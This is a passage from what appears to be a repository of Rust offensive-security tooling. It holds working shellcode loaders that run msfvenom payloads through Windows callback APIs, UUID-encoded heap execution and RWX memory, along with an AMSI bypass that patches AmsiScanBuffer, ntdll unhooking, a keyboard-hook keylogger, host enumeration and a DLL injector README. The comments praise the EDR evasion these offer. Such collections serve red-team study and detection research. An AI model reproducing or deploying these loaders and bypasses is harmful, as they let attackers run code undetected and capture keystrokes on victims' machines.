18 | dependencies = [ 19 | "winapi 0.2.8", 20 | "winapi-build", 21 | ] 22 | 23 | [[package]] 24 | name = "winapi" 25 | version = "0.2.8" 26 | source = "registry+https://github.com/rust-lang/crates.io-index" 27 | checksum = "167dc9d6949a9b857f3451275e911c3f44255842c1f7a76f33c55103a909087a" 28 | 29 | [[package]] 30 | name = "winapi" 31 | version = "0.3.9" 32 | source = "registry+https://github.com/rust-lang/crates.io-index" 33 | checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" 34 | dependencies = [ 35 | "winapi-i686-pc-windows-gnu", 36 | "winapi-x86_64-pc-windows-gnu", 37 | ] 38 | 39 | [[package]] 40 | name = "winapi-build" 41 | version = "0.1.1" 42 | source = "registry+https://github.com/rust-lang/crates.io-index" 43 | checksum = "2d315eee3b34aca4797b2da6b13ed88266e6d612562a0c46390af8299fc699bc" 44 | 45 | [[package]] 46 | name = "winapi-i686-pc-windows-gnu" 47 | version = "0.4.0" 48 | source = "registry+https://github.com/rust-lang/crates.io-index" 49 | checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" 50 | 51 | [[package]] 52 | name = "winapi-x86_64-pc-windows-gnu" 53 | version = "0.4.0" 54 | source = "registry+https://github.com/rust-lang/crates.io-index" 55 | checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" 56 | -------------------------------------------------------------------------------- /Process_Injection_Self_EnumSystemGeoID/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "enum_system_geo_id" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | kernel32-sys = "0.2.1" 10 | winapi = {version = "0.3.8", features=[ 11 | "winnt", 12 | "memoryapi", 13 | "errhandlingapi", 14 | "processthreadsapi", 15 | "synchapi", 16 | "winbase", 17 | "handleapi", 18 | "libloaderapi", 19 | "winnls" 20 | ]} 21 | -------------------------------------------------------------------------------- /Process_Injection_Self_EnumSystemGeoID/src/main.rs: -------------------------------------------------------------------------------- 1 | // Ref: https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/shellcode_callback_bin.nim 2 | // Callback function to hold and execute shellcode 3 | // This is a fun one. I like it a lot because how many EDRs are going to hook this random-ass API call? Good for self injection but does allocate as RWX so be careful. 4 | extern crate kernel32; 5 | use winapi::um::winnt::{MEM_COMMIT,PAGE_EXECUTE_READWRITE}; 6 | use std::ptr; 7 | use std::io::{stdin, stdout, Read, Write}; 8 | use winapi::um::errhandlingapi; 9 | use winapi::um::winnls::EnumSystemGeoID; 10 | use winapi::um::winnls::{GEO_ENUMPROC}; 11 | use std::mem::transmute; 12 | 13 | // Convinience proc for troubleshooting 14 | fn breakpoint() { 15 | let mut stdout = stdout(); 16 | stdout.write(b"[*] Press Enter to continue...\n").unwrap(); 17 | stdout.flush().unwrap(); 18 | stdin().read(&mut [0]).unwrap(); 19 | } 20 | 21 | fn main() { 22 | callback_shellcode() 23 | } 24 | 25 | fn callback_shellcode() { 26 | 27 | //┌──(kali㉿kali)-[~/Desktop] 28 | //└─$ msfvenom -p windows/x64/exec CMD="calc.exe" -f csharp 29 | let shellcode : [u8;276] = 30 | [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 31 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 32 | 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, 33 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 34 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 35 | 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, 36 | 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, 37 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, 38 | 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, 39 | 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 40 | 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, 41 | 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, 42 | 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, 43 | 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, 44 | 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, 45 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 46 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, 47 | 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, 48 | 0x63,0x2e,0x65,0x78,0x65,0x00]; 49 | 50 | unsafe{ 51 | let curr_proc = kernel32::GetCurrentProcessId(); 52 | 53 | println!("[+] Proc ID: {}", curr_proc.to_string()); 54 | 55 | // Allocate memory RX to current process and get handle to the base addr 56 | let base_addr = kernel32::VirtualAlloc( 57 | ptr::null_mut(), 58 | shellcode.len().try_into().unwrap(), 59 | MEM_COMMIT, 60 | PAGE_EXECUTE_READWRITE 61 | ); 62 | 63 | if base_addr.is_null() { 64 | println!("[-] Couldn't allocate memory to current proc.") 65 | } else { 66 | println!("[+] Allocated memory to current proc."); 67 | } 68 | 69 | breakpoint(); 70 | 71 | // copy shellcode into mem 72 | println!("[*] Copying Shellcode to address in current proc."); 73 | std::ptr::copy(shellcode.as_ptr() as _, base_addr, shellcode.len()); 74 | println!("[*] Copied..."); 75 | 76 | breakpoint(); 77 | 78 | println!("[*] Executing callback function..."); 79 | // Callback execution 80 | let res = EnumSystemGeoID( 81 | 16, 82 | 0, 83 | transmute::<*mut std::ffi::c_void, GEO_ENUMPROC>(base_addr) 84 | ); 85 | 86 | println!("Result: {}", res); 87 | 88 | if res > 0 { 89 | println!("[+] Good!") 90 | } else { 91 | let error = errhandlingapi::GetLastError(); 92 | println!("{}", error.to_string()) 93 | } 94 | } 95 | } 96 | 97 | 98 | 99 | 100 | -------------------------------------------------------------------------------- /Shellcode_Local_inject/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "Exec_Shellcode_In_Memory" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | -------------------------------------------------------------------------------- /Shellcode_Local_inject/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::mem; 2 | 3 | #[no_mangle] 4 | #[link_section = ".text"] 5 | static TEST : [u8;276] = *b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; 6 | 7 | fn main() { 8 | let exec_data: extern "C" fn () -> ! = unsafe { mem::transmute(&TEST as *const _ as *const ()) }; 9 | exec_data(); 10 | } 11 | -------------------------------------------------------------------------------- /UUID_Shellcode_Execution/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "UUID_Shellcode_Execution" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "Furkan Ayar ( @frknayar )" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | bindings = { path = "bindings" } 10 | windows = { version = "0.32.0" } 11 | winapi = {version = "0.3.9", features = ["heapapi","handleapi","winnls","winnt","rpcdce"]} 12 | -------------------------------------------------------------------------------- /UUID_Shellcode_Execution/bindings/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "bindings" 3 | version = "0.0.0" 4 | edition = "2018" 5 | 6 | [dependencies] 7 | windows = "0.32.0" 8 | 9 | [build-dependencies] 10 | windows = "0.32.0" 11 | -------------------------------------------------------------------------------- /UUID_Shellcode_Execution/bindings/build.rs: -------------------------------------------------------------------------------- 1 | fn main() { 2 | windows::build! { 3 | Windows::Win32::System::Rpc::{UuidFromStringA, RPC_STATUS} 4 | }; 5 | } 6 | -------------------------------------------------------------------------------- /UUID_Shellcode_Execution/bindings/src/lib.rs: -------------------------------------------------------------------------------- 1 | windows::include_bindings!(); 2 | -------------------------------------------------------------------------------- /UUID_Shellcode_Execution/src/main.rs: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Furkan Ayar, Twitter: @frknayar 3 | License: BSD 3-Clause 4 | This is Rust implementation of UUID Shellcode execution from HEAP memory area which has been seen in the wild by lazarus loader. 5 | References: 6 | - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/ 7 | - https://blog.sunggwanchoi.com/eng-uuid-shellcode-execution/ 8 | - https://gist.github.com/rxwx/c5e0e5bba8c272eb6daa587115ae0014#file-uuid-c 9 | */ 10 | extern crate winapi; 11 | extern crate bindings; 12 | extern crate windows; 13 | 14 | use std::str; 15 | use std::process; 16 | use std::mem::transmute; 17 | use std::ffi::CString; 18 | use winapi::um::heapapi::{HeapCreate, HeapAlloc}; 19 | use winapi::um::handleapi::CloseHandle; 20 | use winapi::um::winnls::{EnumSystemLocalesA, LOCALE_ENUMPROCA}; 21 | use winapi::um::winnt::{HEAP_CREATE_ENABLE_EXECUTE}; 22 | use winapi::shared::basetsd::DWORD_PTR; 23 | use winapi::shared::ntstatus::STATUS_SUCCESS; 24 | use windows::Guid; 25 | use bindings::Windows::Win32::System::Rpc::{RPC_STATUS, UuidFromStringA}; 26 | 27 | fn main() { 28 | 29 | println!("[*] UUID Shellcode Execution"); 30 | // msfvenom -a x64 -p windows/x64/exec CMD=notepad.exe EXITFUNC=thread 31 | const SIZE: usize = 18; 32 | let uuidarr: [&str; SIZE] = [ 33 | "e48348fc-e8f0-00c0-0000-415141505251", 34 | "d2314856-4865-528b-6048-8b5218488b52", 35 | "728b4820-4850-b70f-4a4a-4d31c94831c0", 36 | "7c613cac-2c02-4120-c1c9-0d4101c1e2ed", 37 | "48514152-528b-8b20-423c-4801d08b8088", 38 | "48000000-c085-6774-4801-d0508b481844", 39 | "4920408b-d001-56e3-48ff-c9418b348848", 40 | "314dd601-48c9-c031-ac41-c1c90d4101c1", 41 | "f175e038-034c-244c-0845-39d175d85844", 42 | "4924408b-d001-4166-8b0c-48448b401c49", 43 | "8b41d001-8804-0148-d041-5841585e595a", 44 | "59415841-5a41-8348-ec20-4152ffe05841", 45 | "8b485a59-e912-ff57-ffff-5d48ba010000", 46 | "00000000-4800-8d8d-0101-000041ba318b", 47 | "d5ff876f-e0bb-2a1d-0a41-baa695bd9dff", 48 | "c48348d5-3c28-7c06-0a80-fbe07505bb47", 49 | "6a6f7213-5900-8941-daff-d56e6f746570", 50 | "652e6461-6578-0000-0000-000000000000" ]; 51 | 52 | unsafe { 53 | // Creating and Allocating Heap Memory 54 | println!("[*] Allocating Heap Memory"); 55 | let h_heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 56 | let h_addr = HeapAlloc(h_heap, 0, 0x100000); 57 | 58 | let mut p_addr = h_addr as DWORD_PTR; 59 | if p_addr != STATUS_SUCCESS as usize { 60 | println!("[+] Heap Memory is Allocated at {:#x}", p_addr); 61 | } else { 62 | println!("[-] Heap Alloc Error !"); 63 | process::exit(0x0001); 64 | } 65 | 66 | println!("[*] UUID Array size is {}", SIZE); 67 | // Planting Shellcode From UUID Array onto Allocated Heap Memory 68 | for i in 0..SIZE { 69 | let cstr = CString::new(uuidarr[i]).unwrap(); 70 | let g_addr = cstr.as_ptr() as *mut u8; 71 | let status: RPC_STATUS = UuidFromStringA(g_addr, p_addr as *mut Guid); 72 | if status != RPC_STATUS::from(0) { 73 | if status == RPC_STATUS::from(1705) { 74 | println!("[-] Invalid UUID String Detected at {:?}", g_addr); 75 | process::exit(0x0001); 76 | } else { 77 | println!("[-] Something Went Wrong, Error Code: {:?}", status); 78 | } 79 | } 80 | p_addr += 16; 81 | } 82 | println!("[+] Shellcode is successfully placed between {:#x} and {:#x}", h_addr as DWORD_PTR, p_addr); 83 | 84 | // Calling the Callback Function 85 | println!("[*] Calling the Callback Function ..."); 86 | EnumSystemLocalesA(transmute::<*mut winapi::ctypes::c_void, LOCALE_ENUMPROCA>(h_addr), 0); 87 | CloseHandle(h_heap); 88 | process::exit(0x0000); 89 | } 90 | } 91 | -------------------------------------------------------------------------------- /Unhooking/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rust-unhooking" 3 | version = "0.1.0" 4 | edition = "2018" 5 | authro = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | kernel32-sys = "0.2.2" 10 | winapi = {version = "0.3.9", features =["processthreadsapi","handleapi","memoryapi"]} 11 | -------------------------------------------------------------------------------- /Unhooking/src/main.rs: -------------------------------------------------------------------------------- 1 | extern crate kernel32; 2 | extern crate winapi; 3 | use std::ptr::null_mut; 4 | use winapi::ctypes::c_void; 5 | use winapi::um::processthreadsapi::GetCurrentProcess; 6 | use winapi::um::memoryapi::WriteProcessMemory; 7 | 8 | fn main() { 9 | unsafe { 10 | let handle = kernel32::LoadLibraryA("ntdll\0".as_ptr() as *const i8); 11 | let mini = kernel32::GetProcAddress(handle, "NtClose\0".as_ptr() as *const i8); 12 | WriteProcessMemory(GetCurrentProcess(),mini as *mut c_void, b"\x4C\x8B\xD1\xB8\x0E".as_ptr() as *mut c_void,5,null_mut()); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /amsi_bypass/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "amsi_bypass" 3 | version = "0.1.0" 4 | authors = ["Idov31 "] 5 | edition = "2021" 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | [[bin]] 9 | name = "amsi_bypass" 10 | path = "src/main.rs" 11 | 12 | [dependencies] 13 | winapi = {version = "0.3.9", features=["memoryapi", "libloaderapi", "processthreadsapi"]} 14 | win32-error = "0.9.0" 15 | -------------------------------------------------------------------------------- /amsi_bypass/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::{ffi::CString, ptr}; 2 | 3 | use winapi::{ 4 | um::{ 5 | memoryapi::{ 6 | VirtualProtect, 7 | WriteProcessMemory 8 | }, 9 | libloaderapi::{ 10 | LoadLibraryA, 11 | GetProcAddress 12 | }, 13 | processthreadsapi::GetCurrentProcess, 14 | winnt::PAGE_READWRITE 15 | }, 16 | shared::{ 17 | minwindef::{ 18 | DWORD, 19 | FALSE 20 | }, 21 | ntdef::NULL 22 | } 23 | }; 24 | 25 | fn main() { 26 | println!("[+] Patching amsi for current process..."); 27 | 28 | unsafe { 29 | // Getting the address of AmsiScanBuffer. 30 | let patch = [0x40, 0x40, 0x40, 0x40, 0x40, 0x40]; 31 | let amsi_dll = LoadLibraryA(CString::new("amsi").unwrap().as_ptr()); 32 | let amsi_scan_addr = GetProcAddress(amsi_dll, CString::new("AmsiScanBuffer").unwrap().as_ptr()); 33 | let mut old_permissions: DWORD = 0; 34 | 35 | // Overwrite this address with nops. 36 | if VirtualProtect(amsi_scan_addr.cast(), 6, PAGE_READWRITE, &mut old_permissions) == FALSE { 37 | panic!("[-] Failed to change protection."); 38 | } 39 | let written: *mut usize = ptr::null_mut(); 40 | 41 | if WriteProcessMemory(GetCurrentProcess(), amsi_scan_addr.cast(), patch.as_ptr().cast(), 6, written) == FALSE { 42 | panic!("[-] Failed to overwrite function."); 43 | } 44 | 45 | // Restoring the permissions. 46 | VirtualProtect(amsi_scan_addr.cast(), 6, old_permissions, &mut old_permissions); 47 | println!("[+] AmsiScanBuffer patched!"); 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /apihooking/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "apihooking" 3 | version = "0.1.0" 4 | authors = ["Idov31 "] 5 | edition = "2021" 6 | 7 | [[bin]] 8 | name = "apihooking" 9 | path = "src/main.rs" 10 | 11 | [dependencies] 12 | winapi = {version = "0.3.9", features = ["winuser"]} 13 | win32-error = "0.9.0" 14 | detour = "0.8.1" -------------------------------------------------------------------------------- /apihooking/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::ffi::CString; 2 | use winapi::{ 3 | um::{ 4 | winuser::MessageBoxA, 5 | }, 6 | shared::{ 7 | windef::HWND, 8 | minwindef::{ 9 | UINT 10 | }, 11 | ntdef::LPCSTR 12 | } 13 | }; 14 | use detour::static_detour; 15 | 16 | static_detour! { 17 | static MsgBox: unsafe extern "system" fn(HWND, LPCSTR, LPCSTR, UINT) -> i32; 18 | } 19 | 20 | 21 | fn main() { 22 | unsafe { 23 | MsgBox.initialize(MessageBoxA, |hwnd, lp_text, lp_caption, u_type| { 24 | println!("Hooked MessageBoxA"); 25 | MsgBox.call(hwnd, lp_text, lp_caption, u_type) 26 | }); 27 | MessageBoxA(0 as HWND, CString::new("Before").unwrap().as_ptr(), CString::new("Before").unwrap().as_ptr(), 0); 28 | MsgBox.enable(); 29 | MessageBoxA(0 as HWND, CString::new("After").unwrap().as_ptr(), CString::new("After").unwrap().as_ptr(), 0); 30 | MsgBox.disable(); 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /asm_syscall/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "asm_syscall" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | -------------------------------------------------------------------------------- /asm_syscall/src/main.rs: -------------------------------------------------------------------------------- 1 | #![feature(asm)] 2 | 3 | fn main() { 4 | let rax:u64; 5 | unsafe { 6 | asm!( 7 | "push rbx", 8 | "xor rbx, rbx", 9 | "xor rax, rax", 10 | "mov rbx, qword ptr gs:[0x60]", 11 | "mov rax,rbx", 12 | "pop rbx", 13 | out("rax") rax, 14 | ); 15 | } 16 | println!("PEB Address: 0x{:x}",rax); 17 | } 18 | -------------------------------------------------------------------------------- /base64_system_enum/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "base64_system_enum" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | whoami = { git = "https://github.com/libcala/whoami" } 10 | base64 = {version="0.13.0"} 11 | -------------------------------------------------------------------------------- /base64_system_enum/src/main.rs: -------------------------------------------------------------------------------- 1 | use base64; 2 | use whoami; 3 | 4 | fn main() { 5 | let deviceName =base64::encode(&whoami::hostname()); 6 | let userName =base64::encode(&whoami::username()); 7 | let procNamePath = std::env::current_exe(); 8 | println!("Hostname: {}\nEncoded Hostname: {}",whoami::hostname(),deviceName); 9 | println!("Username: {}\nEncoded Username: {}",whoami::username(),userName); 10 | println!("Executable Path: {:?}",procNamePath.unwrap()); 11 | println!("Decoded Username: {:?}",String::from_utf8_lossy(&base64::decode("REVTS1RPUC1VNElFMEVF").unwrap())); 12 | } 13 | -------------------------------------------------------------------------------- /cargo.toml: -------------------------------------------------------------------------------- 1 | cargo-features = ["strip"] 2 | [package] 3 | name = "test" 4 | version = "0.1.0" 5 | edition = "2021" 6 | author = "trickster0" 7 | 8 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 9 | 10 | [profile.release] 11 | strip = "symbols" 12 | panic = "abort" 13 | trim-path = true 14 | opt-level = "z" 15 | lto = true 16 | 17 | [dependencies] 18 | kernel32-sys = "0.2.2" 19 | winapi = {version = "0.3.9", features = ["winnt"] } 20 | -------------------------------------------------------------------------------- /http-https-requests/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "http-https-requests" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | reqwest = {version = "0.11.4", features = ["blocking"]} 10 | -------------------------------------------------------------------------------- /http-https-requests/src/main.rs: -------------------------------------------------------------------------------- 1 | extern crate reqwest; 2 | 3 | fn main() { 4 | 5 | let client = reqwest::blocking::Client::builder().danger_accept_invalid_certs(true).build().unwrap(); 6 | let _response = client.post("https://google.com/test").header("Authorization", "testtest" ).body("test").send(); 7 | let test = _response.unwrap().text().unwrap(); 8 | let client2 = reqwest::blocking::Client::builder().danger_accept_invalid_certs(true).build().unwrap(); 9 | let url = "https://google.com"; 10 | let argumentsdata = format!("register={}","1234"); 11 | let concat = [url,&argumentsdata].join("/"); 12 | client2.get(&concat).send(); 13 | 14 | } 15 | -------------------------------------------------------------------------------- /keyboard_hooking/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "keyboard_hooking" 3 | version = "0.1.0" 4 | authors = ["Idov31 "] 5 | edition = "2021" 6 | 7 | [[bin]] 8 | name = "keyboard_hooking" 9 | path = "src/main.rs" 10 | 11 | [dependencies] 12 | windows = {version = "0.43.0", features = [ 13 | "Win32_Foundation", 14 | "Win32_UI_WindowsAndMessaging"]} -------------------------------------------------------------------------------- /keyboard_hooking/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::ptr::null_mut; 2 | 3 | use windows::Win32::{ 4 | UI::{ 5 | WindowsAndMessaging::{ 6 | SetWindowsHookExW, 7 | UnhookWindowsHookEx, 8 | GetMessageW, 9 | CallNextHookEx, 10 | HHOOK, 11 | KBDLLHOOKSTRUCT, 12 | WM_KEYDOWN, 13 | WH_KEYBOARD_LL 14 | } 15 | }, 16 | Foundation::{ 17 | LRESULT, 18 | LPARAM, 19 | WPARAM, 20 | HINSTANCE, 21 | HWND 22 | } 23 | }; 24 | 25 | static mut HOOK_ID: HHOOK = HHOOK(0); 26 | 27 | fn main() { 28 | unsafe { 29 | match SetWindowsHookExW(WH_KEYBOARD_LL, Some(hook_keyboard), HINSTANCE(0), 0) { 30 | Ok(hook_id) => { 31 | HOOK_ID = hook_id; 32 | 33 | while GetMessageW(null_mut(), HWND(0), 0, 0).as_bool() { 34 | // Do some stuff here. 35 | } 36 | UnhookWindowsHookEx(hook_id); 37 | } 38 | Err(err) => { 39 | eprintln!("Failed to SetWindowsHookEx: {}", err); 40 | } 41 | } 42 | } 43 | } 44 | 45 | unsafe extern "system" fn hook_keyboard(code: i32, wparam: WPARAM, lparam: LPARAM) -> LRESULT { 46 | if wparam.0 as u32 == WM_KEYDOWN { 47 | let info: *mut KBDLLHOOKSTRUCT = std::mem::transmute(lparam); 48 | let char_written = char::from_u32((*info).vkCode).unwrap(); 49 | 50 | println!("Character written: {}", char_written); 51 | } 52 | return CallNextHookEx(HOOK_ID, code, wparam, lparam); 53 | } 54 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 memN0ps 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/README.md: -------------------------------------------------------------------------------- 1 | # arsenal-rs 2 | Rusty Arsenal 3 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/dll_injector_classic-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | debug/ 4 | target/ 5 | 6 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 7 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 8 | Cargo.lock 9 | 10 | # These are backup files generated by rustfmt 11 | **/*.rs.bk 12 | 13 | # MSVC Windows builds of rustc generate these, which store debugging information 14 | *.pdb 15 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/dll_injector_classic-rs/Cargo.toml: -------------------------------------------------------------------------------- 1 | [workspace] 2 | 3 | members = [ 4 | "inject", 5 | "testdll", 6 | ] 7 | 8 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 9 | [profile.release] 10 | opt-level = "z" # Optimize for size. 11 | lto = true # Enable Link Time Optimization 12 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 13 | panic = "abort" # Abort on panic 14 | strip = true # Automatically strip symbols from the binary. -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/dll_injector_classic-rs/README.md: -------------------------------------------------------------------------------- 1 | # Classic DLL Injection 2 | 3 | Simple classic DLL Injector made for fun, practice, and for testing things. Check out my Manual Mapper in Rust: https://github.com/memN0ps/mmapper-rs or Shellcode Reflective DLL Injection in Rust: https://github.com/memN0ps/srdi-rs for alternatives. 4 | 5 | ## Usage 6 | 7 | ``` 8 | Usage: inject.exe 9 | ``` 10 | 11 | ## Example 12 | 13 | Enable logger (for debugging only) 14 | 15 | ``` 16 | PS C:\Users\memn0ps\Documents\Github\arsenal\dll_injector_classic-rs\target\debug> $env:RUST_LOG="info" 17 | ``` 18 | 19 | Inject DLL 20 | 21 | ``` 22 | PS C:\> .\inject.exe notepad.exe C:\Users\memn0ps\Documents\Github\arsenal\dll_injector_classic-rs\target\debug\testdll.dll 23 | 24 | [2022-11-03T03:12:47Z INFO inject] Process: notepad.exe 25 | [2022-11-03T03:12:47Z INFO inject] Path: C:\Users\memn0ps\Documents\Github\arsenal\dll_injector_classic-rs\target\debug\testdll.dll 26 | [2022-11-03T03:12:47Z INFO inject] Process ID: 5272 27 | [2022-11-03T03:12:47Z INFO inject] Allocated Memory: 0x2067a7b0000 28 | [2022-11-03T03:12:47Z INFO inject] Kernel32 Address: 0x7ffe67650000 29 | [2022-11-03T03:12:47Z INFO inject] LoadLibraryA address: 0x7ffe676704f0 30 | [2022-11-03T03:12:47Z INFO inject] Injection Complete! 31 | ``` 32 | 33 | DLL Injected 34 | 35 | ![Injected](./injected.png) -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/dll_injector_classic-rs/inject/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "inject" 3 | version = "0.1.0" 4 | edition = 